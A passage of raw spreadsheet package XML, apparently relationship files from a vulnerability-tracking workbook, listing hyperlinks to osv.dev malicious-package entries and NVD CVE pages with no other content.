Target="https://osv.dev/vulnerability/MAL-2026-16107" TargetMode="External" Id="rId1325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16085" TargetMode="External" Id="rId1326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16093" TargetMode="External" Id="rId1327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16106" TargetMode="External" Id="rId1328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16086" TargetMode="External" Id="rId1329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16091" TargetMode="External" Id="rId1330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16053" TargetMode="External" Id="rId1331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16054" TargetMode="External" Id="rId1332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16055" TargetMode="External" Id="rId1333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16059" TargetMode="External" Id="rId1334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16060" TargetMode="External" Id="rId1335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16061" TargetMode="External" Id="rId1336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16062" TargetMode="External" Id="rId1337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16063" TargetMode="External" Id="rId1338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16064" TargetMode="External" Id="rId1339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16065" TargetMode="External" Id="rId1340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16069" TargetMode="External" Id="rId1341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16070" TargetMode="External" Id="rId1342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16071" TargetMode="External" Id="rId1343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16072" TargetMode="External" Id="rId1344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16073" TargetMode="External" Id="rId1345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16074" TargetMode="External" Id="rId1346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16075" TargetMode="External" Id="rId1347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16076" TargetMode="External" Id="rId1348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16077" TargetMode="External" Id="rId1349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16078" TargetMode="External" Id="rId1350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16079" TargetMode="External" Id="rId1351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16080" TargetMode="External" Id="rId1352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16081" TargetMode="External" Id="rId1353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16082" TargetMode="External" Id="rId1354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16094" TargetMode="External" Id="rId1355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16095" TargetMode="External" Id="rId1356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16096" TargetMode="External" Id="rId1357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16097" TargetMode="External" Id="rId1358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16098" TargetMode="External" Id="rId1359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16099" TargetMode="External" Id="rId1360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16100" TargetMode="External" Id="rId1361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16101" TargetMode="External" Id="rId1362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16102" TargetMode="External" Id="rId1363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16103" TargetMode="External" Id="rId1364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16104" TargetMode="External" Id="rId1365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16105" TargetMode="External" Id="rId1366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16121" TargetMode="External" Id="rId1367" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet3.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75650" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86218" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58704" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87491" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-25249" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19490" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20079" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42016" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42018" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67277" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76460" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76461" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84869" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85706" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86060" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87886" TargetMode="External" Id="rId16" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet4.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75650" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86218" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58704" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87491" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54745" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65956" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79696" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85061" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85978" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87827" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55634" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62283" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67401" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-67066" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-70290" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-70293" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21095" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21096" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-36433" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37006" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37751" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41871" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45018" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50894" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52103" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52490" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53611" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54569" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55546" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56207" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71624" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71625" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71801" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71805" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75325" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75337" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75338" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76904" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77649" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77650" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77651" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7861" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78745" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79391" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79689" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79941" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80129" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80131" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80172" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84372" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85102" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85103" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85506" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86478" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86480" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87534" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87544" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87595" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53649" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54523" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54694" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54754" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54755" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86751" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87438" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87448" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87455" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87464" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87470" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87474" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87488" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87492" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87494" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87500" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87504" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87512" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87520" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87526" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87527" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87528" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87529" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87547" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87558" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87581" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87607" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87609" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87621" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87634" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87637" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87638" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87643" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87646" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87650" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87654" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39975" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16876" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47156" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48996" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51106" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53578" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53579" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53670" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53671" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55220" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55378" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57910" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63310" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65641" TargetMode="External" Id="rId108" /><Relationship 